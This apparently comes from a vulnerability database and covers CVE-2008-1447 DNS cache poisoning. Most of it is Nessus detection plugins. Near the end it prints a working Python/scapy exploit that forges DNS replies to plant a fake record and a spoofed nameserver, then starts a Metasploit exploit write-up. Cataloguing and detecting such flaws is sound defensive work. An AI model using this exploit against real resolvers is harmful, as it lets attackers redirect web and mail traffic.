isnull(responses_ports) )\n {\n\t responses_ports = make_list();\n \t if ( max_index(keys(per_ip)) > 0 ) NUM += 4;\n\t}\n responses_ports[max_index(responses_ports)] = int(array[1]);\n per_ip[array[0]] = responses_ports;\n\n if ( totCount > HARD_LIMIT ) break;\n}\n\n# debug logging\nforeach dns_server ( keys(per_ip) )\n{\n responses_ports = per_ip[dns_server];\n spad_log(message:\"DNS Server \" + dns_server + \" response ports : \" + join(responses_ports, sep:\",\"));\n}\n\nbuggy_dns_servers = make_array();\nforeach dns_server ( keys(per_ip) )\n{\n responses_ports = per_ip[dns_server];\n if ( max_index(responses_ports) >= MIN_SAMPLES )\n {\n flag = 0;\n for ( i = 1 ; i < max_index(responses_ports) && flag == 0; i ++ ) {\n if ( abs(responses_ports[i - 1] - responses_ports[i]) >= 20 )\n flag = 1;\n 
}\n if ( flag == 0 )\n {\n buggy_dns_servers[dns_server] = responses_ports;\n }\n }\n}\n\nif ( max_index(keys(buggy_dns_servers)) > 0 )\n{\n report = \"\nThe remote DNS server uses non-random ports for its\nDNS requests. An attacker may spoof DNS responses.\n\nList of used ports :\n\";\n foreach dns_server ( keys(buggy_dns_servers) )\n {\n report += '\\n+ DNS Server: ' + dns_server + '\\n';\n responses_ports = buggy_dns_servers[dns_server];\n for ( i = 0 ; i < max_index(responses_ports) ; i ++ )\n\t{\n\t report += '|- Port: ' + responses_ports[i] + '\\n';\n\t}\n }\n\n security_hole(port:53, proto: \"udp\", extra: report);\n}\nelse\n{\n audit(AUDIT_LISTEN_NOT_VULN, \"DNS\", port);\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2017-10-29T13:39:11", "edition": 2, "description": "Dan Kaminsky discovered that properties inherent to the DNS protocol lead to practical DNS cache poisoning attacks. Among other things, successful attacks can lead to misdirected web traffic and email rerouting.", "published": "2008-07-10T00:00:00", "type": "nessus", "title": "Debian DSA-1604-1 : bind - DNS cache poisoning", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "cpe": ["cpe:/o:debian:debian_linux"], "modified": "2013-06-03T00:00:00", "id": "DEBIAN_DSA-1604.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33451", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated advisory does not \n# have any package tests.\n#\n# Disabled on 2012/01/20.\n#\n\n# This script was automatically generated from Debian Security \n# Advisory DSA-1604. 
It is released under the Nessus Script \n# Licence.\n#\n# Debian Security Advisory DSA-1604 is (C) Software in the Public\n# Interest, Inc; see http://www.debian.org/license for details.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33451);\n script_version(\"$Revision: 1.16 $\");\n script_cvs_date(\"$Date: 2013/06/03 16:47:17 $\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_osvdb_id(47232, 47916, 47926, 47927, 48245);\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"DSA\", value:\"1603\");\n script_xref(name:\"DSA\", value:\"1604\");\n\n script_name(english:\"Debian DSA-1604-1 : bind - DNS cache poisoning\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"The BIND 8 legacy code base could not be updated to include the\nrecommended countermeasure (source port randomization, see DSA-1603-1\nfor details). There are two ways to deal with this situation :\n\n 1. Upgrade to BIND 9 (or another implementation with \n source port randomization). The documentation included\n with BIND 9 contains a migration guide. \n\n 2. Configure the BIND 8 resolver to forward queries to a \n BIND 9 resolver. Provided that the network between \n both resolvers is trusted, this protects the BIND 8 \n resolver from cache poisoning attacks (to the same \n degree that the BIND 9 resolver is protected). \n\nThis problem does not apply to BIND 8 when used exclusively as an\nauthoritative DNS server. 
It is theoretically possible to safely use\nBIND 8 in this way, but updating to BIND 9 is strongly recommended. \nBIND 8 (that is, the bind package) will be removed from the etch\ndistribution in a future point release.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2008-2013 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\n# Deprecated.\nexit(0, \"The associated advisory does not have any package tests.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-01-17T13:44:00", "description": "The dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. 
dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : dnsmasq on SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080811_DNSMASQ_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60462", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60462);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Scientific Linux Security Update : dnsmasq on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Scientific Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. 
dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0808&L=scientific-linux-errata&T=0&P=1051\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5409951d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-06T09:45:04", "description": "In DSA-1603-1, Debian released an update to the BIND 9 domain name\nserver, which introduced UDP source port randomization to mitigate the\nthreat of DNS cache poisoning attacks (identified by the Common\nVulnerabilities and Exposures project as CVE-2008-1447 ). The fix,\nwhile correct, was incompatible with the version of SELinux Reference\nPolicy shipped with Debian Etch, which did not permit a process\nrunning in the named_t domain to bind sockets to UDP ports other than\nthe standard 'domain' port (53). 
The incompatibility affects both the\n'targeted' and 'strict' policy packages supplied by this version of\nrefpolicy.\n\nThis update to the refpolicy packages grants the ability to bind to\narbitrary UDP ports to named_t processes. When installed, the updated\npackages will attempt to update the bind policy module on systems\nwhere it had been previously loaded and where the previous version of\nrefpolicy was 0.0.20061018-5 or below.\n\nBecause the Debian refpolicy packages are not yet designed with policy\nmodule upgradeability in mind, and because SELinux-enabled Debian\nsystems often have some degree of site-specific policy customization,\nit is difficult to assure that the new bind policy can be successfully\nupgraded. To this end, the package upgrade will not abort if the bind\npolicy update fails. The new policy module can be found at\n/usr/share/selinux/refpolicy-targeted/bind.pp after installation.\nAdministrators wishing to use the bind service policy can reconcile\nany policy incompatibilities and install the upgrade manually\nthereafter. A more detailed discussion of the corrective procedure may\nbe found on\nhttps://wiki.debian.org/SELinux/Issues/BindPortRandomization.", "edition": 27, "published": "2008-07-28T00:00:00", "title": "Debian DSA-1617-1 : refpolicy - incompatible policy", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-28T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:refpolicy", "cpe:/o:debian:debian_linux:4.0"], "id": "DEBIAN_DSA-1617.NASL", "href": "https://www.tenable.com/plugins/nessus/33737", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1617. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33737);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"DSA\", value:\"1617\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Debian DSA-1617-1 : refpolicy - incompatible policy\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In DSA-1603-1, Debian released an update to the BIND 9 domain name\nserver, which introduced UDP source port randomization to mitigate the\nthreat of DNS cache poisoning attacks (identified by the Common\nVulnerabilities and Exposures project as CVE-2008-1447 ). The fix,\nwhile correct, was incompatible with the version of SELinux Reference\nPolicy shipped with Debian Etch, which did not permit a process\nrunning in the named_t domain to bind sockets to UDP ports other than\nthe standard 'domain' port (53). The incompatibility affects both the\n'targeted' and 'strict' policy packages supplied by this version of\nrefpolicy.\n\nThis update to the refpolicy packages grants the ability to bind to\narbitrary UDP ports to named_t processes. 
When installed, the updated\npackages will attempt to update the bind policy module on systems\nwhere it had been previously loaded and where the previous version of\nrefpolicy was 0.0.20061018-5 or below.\n\nBecause the Debian refpolicy packages are not yet designed with policy\nmodule upgradeability in mind, and because SELinux-enabled Debian\nsystems often have some degree of site-specific policy customization,\nit is difficult to assure that the new bind policy can be successfully\nupgraded. To this end, the package upgrade will not abort if the bind\npolicy update fails. The new policy module can be found at\n/usr/share/selinux/refpolicy-targeted/bind.pp after installation.\nAdministrators wishing to use the bind service policy can reconcile\nany policy incompatibilities and install the upgrade manually\nthereafter. A more detailed discussion of the corrective procedure may\nbe found on\nhttps://wiki.debian.org/SELinux/Issues/BindPortRandomization.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=490271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-1447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://wiki.debian.org/SELinux/Issues/BindPortRandomization\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1617\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the refpolicy packages.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 0.0.20061018-5.1+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:refpolicy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/28\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"selinux-policy-refpolicy-dev\", reference:\"0.0.20061018-5.1+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"selinux-policy-refpolicy-doc\", reference:\"0.0.20061018-5.1+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"selinux-policy-refpolicy-src\", reference:\"0.0.20061018-5.1+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"selinux-policy-refpolicy-strict\", reference:\"0.0.20061018-5.1+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"selinux-policy-refpolicy-targeted\", reference:\"0.0.20061018-5.1+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 
\"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T14:03:07", "description": "This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. (CVE-2008-1447)", "edition": 23, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : dnsmasq (dnsmasq-147)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2009-07-21T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:dnsmasq"], "id": "SUSE_11_0_DNSMASQ-080813.NASL", "href": "https://www.tenable.com/plugins/nessus/39951", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dnsmasq-147.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39951);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"openSUSE Security Update : dnsmasq (dnsmasq-147)\");\n script_summary(english:\"Check for the dnsmasq-147 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. 
(CVE-2008-1447)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=411761\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dnsmasq-2.45-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity 
> 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "seebug": [{"lastseen": "2017-11-19T21:29:49", "description": "BUGTRAQ ID: 31017\r\nCVE ID: CVE-2008-3350\r\nCNCVE ID: CNCVE-20083350\r\n\r\nDnsmasq is a lightweight DNS server program.\r\nDnsmasq's handling of leases has multiple security issues; a remote attacker can exploit them to mount a denial-of-service attack against the application.\r\n- A problem when an unknown client attempts to renew a DHCP lease can crash the application.\r\n- Processing a DHCPINFORM from a host that has no lease can crash the application.\n\nGentoo net-dns/dnsmasq 2.43\r\nDnsmasq Dnsmasq 2.43\n Upgrade to the latest version:\r\n<a href=http://www.thekelleys.org.uk/dnsmasq/doc.html target=_blank>http://www.thekelleys.org.uk/dnsmasq/doc.html</a>", "published": "2008-09-10T00:00:00", "title": "Dnsmasq DHCP Lease Multiple Remote Denial of Service Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3350"], "modified": "2008-09-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3994", "id": "SSV:3994", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T21:33:51", "description": "No description provided by source.", "published": "2008-07-24T00:00:00", "title": "BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)", "type": "seebug", 
"bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17308", "id": "SSV:17308", "sourceData": "\n from scapy import *\nimport random\n\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\n# http://www.solisproject.net/\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n# This script exploit the flaw discovered by Dan Kaminsky\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n# http://www.kb.cert.org/vuls/id/800113\n\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\n# the transaction ID.\n# It also insert Authority record for a valid record of the target domain.\n\n# To use this script, you have to discover the source port used by the vulnerable\n# DNS server.\n# Python is really slow, so it will take some time, but it works :-)\n\n\n# IP to insert for our dummy record\ntargetip = "X.X.X.X"\n# Vulnerable recursive DNS server\ntargetdns = "X.X.X.X"\n# Authoritative NS for the target domain\nsrcdns = ["X.X.X.X"]\n\n# Domain to play with\ndummydomain = ""\nbasedomain = ".example.com."\n# sub-domain to claim authority on\ndomain = "sub.example.com."\n# Spoofed authoritative DNS for the sub-domain\nspoof="ns.evil.com."\n# src port of vulnerable DNS for recursive queries\ndnsport = 
32883\n\n# base packet\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\n\tUDP(sport=53, dport=dnsport)/ \\\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\n\t)\n\n\ncurrentid = 1024\ndummyid = 3\nwhile 1:\n\tdummydomain = "a" + str(dummyid) + basedomain\n\tdummyid = dummyid + 1\n\t# request for our dummydomain\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tsend(req)\n\n\t# build the response\n\trep.getlayer(DNS).qd.qname = dummydomain\n\trep.getlayer(DNS).an.rrname = dummydomain\n\n\tfor i in range(50):\n\t\t# TXID\n\t\trep.getlayer(DNS).id = currentid\n\t\tcurrentid = currentid + 1\n\t\tif currentid == 65536:\n\t\t\tcurrentid = 1024\n\n\t\t# len and chksum\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\n\n\t\tprint "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\n\t\tsend(rep, verbose=0)\n\n\t# check to see if it worked\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\n\ttry:\n\t\tif z[DNS].an.rdata == targetip:\n\t\t\tprint "Successfully poisonned our target with a dummy record !!"\n\t\t\tbreak\n\texcept:\n\t\tprint "Poisonning failed"\n\n# milw0rm.com [2008-07-24]\n\n ", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17308"}, {"lastseen": "2017-11-19T21:33:48", "description": "No description provided by source.", "published": "2008-07-24T00:00:00", "title": "BIND 9.4.1-9.4.2 Remote DNS Cache Poisoning Flaw Exploit (meta)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-9165", "id": "SSV:9165", "sourceData": "\n ____ ____ __ __\r\n / \\ / \\ | | | |\r\n ----====####/ /\\__\\##/ /\\ \\##| |##| |####====----\r\n | | | |__| | | | | |\r\n | | ___ | __ | | | | |\r\n ------======######\\ \\/ /#| |##| |#| |##| |######======------\r\n \\____/ |__| |__| \\______/\r\n \r\n Computer Academic Underground\r\n http://www.caughq.org\r\n Exploit Code\r\n\r\n===============/========================================================\r\nExploit ID: CAU-EX-2008-0002\r\nRelease Date: 2008.07.23\r\nTitle: bailiwicked_host.rb\r\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit\r\nTested: BIND 9.4.1-9.4.2\r\nAttributes: Remote, Poison, Resolver, Metasploit\r\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt\r\nAuthor/Email: I)ruid <druid (@) caughq.org>\r\n H D Moore <hdm (@) metasploit.com>\r\n===============/========================================================\r\n\r\nDescription\r\n===========\r\n\r\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\r\nwhich allow the insertion of malicious DNS records into the cache of the\r\ntarget nameserver. This exploit caches a single malicious host entry\r\ninto the target nameserver. 
By causing the target nameserver to query\r\nfor random hostnames at the target domain, the attacker can spoof a\r\nresponse to the target server including an answer for the query, an\r\nauthority server record, and an additional record for that server,\r\ncausing target nameserver to insert the additional record into the\r\ncache.\r\n\r\n\r\nExample\r\n=======\r\n\r\n# /msf3/msfconsole\r\n\r\n _ _ _ _\r\n | | | | (_) |\r\n _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_\r\n| '_ ` _ \\ / _ \\ __/ _` / __| '_ \\| |/ _ \\| | __|\r\n| | | | | | __/ || (_| \\__ \\ |_) | | (_) | | |_\r\n|_| |_| |_|\\___|\\__\\__,_|___/ .__/|_|\\___/|_|\\__|\r\n | |\r\n |_|\r\n\r\n\r\n =[ msf v3.2-release\r\n+ -- --=[ 298 exploits - 124 payloads\r\n+ -- --=[ 18 encoders - 6 nops\r\n =[ 72 aux\r\n\r\nmsf > use auxiliary/spoof/dns/bailiwicked_host\r\nmsf auxiliary(bailiwicked_host) > show options\r\n\r\nModule options:\r\n\r\n Name Current Setting Required Description\r\n ---- --------------- -------- -----------\r\n HOSTNAME pwned.example.com yes Hostname to hijack\r\n NEWADDR 1.3.3.7 yes New address for hostname\r\n RECONS 208.67.222.222 yes Nameserver used for reconnaissance\r\n RHOST yes The target address\r\n SRCPORT yes The target server's source query port (0 for automatic)\r\n XIDS 10 yes Number of XIDs to try for each query\r\n\r\nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D\r\nRHOST => A.B.C.D\r\n\r\nmsf auxiliary(bailiwicked_host) > check\r\n[*] Using the Metasploit service to verify exploitability...\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> 